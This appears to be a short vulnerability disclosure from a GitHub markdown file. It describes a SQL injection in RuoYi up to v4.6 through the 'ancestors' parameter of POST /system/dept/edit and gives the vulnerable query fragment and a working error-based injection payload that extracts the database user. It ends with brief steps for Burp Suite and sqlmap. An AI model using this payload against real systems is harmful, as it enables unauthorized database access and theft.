Skip to content

Latest commit

 

History

History
24 lines (16 loc) · 1.28 KB

Ruoyiv4.6.md

File metadata and controls

24 lines (16 loc) · 1.28 KB

RuoYi up to v4.6 was discovered to contain a SQL injection vulnerability via the component /system/dept/edit ${->updateDeptStatus->updateParentDeptStatus->updateDept->editSave Route: Post: /system/dept/edit Parameter: ancestors Splice: where dept_id in (${ancestors}) Poc: DeptName= 1&deptid =100&ParentId=12&Status= 0&ordernum =1&ancestors=0)or(extractvalue(1,concat((select user())))); #

1

Find the corresponding function points according to the source code information 1

Use the save function in this function and find the packet that triggers the /system/dept/edit route 1 1

Capture packets using burpsuite, save the packets, and then use poc injection to get the database information 1 1

Later you can save the packet and inject it into sqlmap to get more database information (close parentheses)